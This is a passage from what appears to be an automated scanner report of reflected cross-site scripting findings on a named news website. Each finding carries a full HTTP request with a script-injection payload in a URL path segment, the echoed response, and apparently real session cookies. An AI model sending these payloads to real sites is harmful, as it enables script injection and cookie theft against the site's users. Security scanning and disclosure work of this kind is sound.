User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542

Response

HTTP/1.0 404 Not Found
Vary: Accept-Encoding
Date: Mon, 31 Jan 2011 22:09:11 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 22:09:11 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
script%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.coma8188\"><script>alert(1)</script>e9ff90f9af1/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%
...[SNIP]...

1.92. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 11]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg

Issue detail

The value of REST URL parameter 11 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d576"><script>alert(1)</script>803d0c7c394 was submitted in the REST URL parameter 11. This input was echoed as 2d576\"><script>alert(1)</script>803d0c7c394 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files2d576"><script>alert(1)</script>803d0c7c394/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1
Host: thefastertimes.com
Proxy-Connection: keep-alive
Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542

Response

HTTP/1.0 404 Not Found
Vary: Accept-Encoding
Date: Mon, 31 Jan 2011 22:10:23 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 22:10:23 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files2d576\"><script>alert(1)</script>803d0c7c394/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E
...[SNIP]...

1.93. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 12]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg

Issue detail

The value of REST URL parameter 12 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b157"><script>alert(1)</script>b60a879cda8 was submitted in the REST URL parameter 12. This input was echoed as 2b157\"><script>alert(1)</script>b60a879cda8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/20112b157"><script>alert(1)</script>b60a879cda8/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1
Host: thefastertimes.com
Proxy-Connection: keep-alive
Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542

Response

HTTP/1.0 404 Not Found
Vary: Accept-Encoding
Date: Mon, 31 Jan 2011 22:11:13 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 22:11:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
ertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/20112b157\"><script>alert(1)</script>b60a879cda8/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home
...[SNIP]...

1.94. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 13]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg

Issue detail

The value of REST URL parameter 13 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1329"><script>alert(1)</script>c2a1dd86290 was submitted in the REST URL parameter 13. This input was echoed as b1329\"><script>alert(1)</script>c2a1dd86290 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01b1329"><script>alert(1)</script>c2a1dd86290/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1
Host: thefastertimes.com
Proxy-Connection: keep-alive
Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542

Response

HTTP/1.0 404 Not Found
Vary: Accept-Encoding
Date: Mon, 31 Jan 2011 22:12:02 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 22:12:02 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
document.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01b1329\"><script>alert(1)</script>c2a1dd86290/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/th
...[SNIP]...

1.95. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 14]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg

Issue detail

The value of REST URL parameter 14 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7965"><script>alert(1)</script>e192b52f48d was submitted in the REST URL parameter 14. This input was echoed as b7965\"><script>alert(1)</script>e192b52f48d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20hrefb7965"><script>alert(1)</script>e192b52f48d=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1
Host: thefastertimes.com
Proxy-Connection: keep-alive
Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542

Response

HTTP/1.0 404 Not Found
Vary: Accept-Encoding
Date: Mon, 31 Jan 2011 22:13:24 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 22:13:24 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20hrefb7965\"><script>alert(1)</script>e192b52f48d=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/t
...[SNIP]...

1.96. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b86c"><script>alert(1)</script>9c6f7d2a56a was submitted in the REST URL parameter 1. This input was echoed as 9b86c\"><script>alert(1)</script>9c6f7d2a56a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C9b86c"><script>alert(1)</script>9c6f7d2a56a/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1
Host: thefastertimes.com
Proxy-Connection: keep-alive
Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542

Response

HTTP/1.0 404 Not Found
Vary: Accept-Encoding
Date: Mon, 31 Jan 2011 21:41:45 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 21:41:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C9b86c\"><script>alert(1)</script>9c6f7d2a56a/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%2
...[SNIP]...

1.97. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
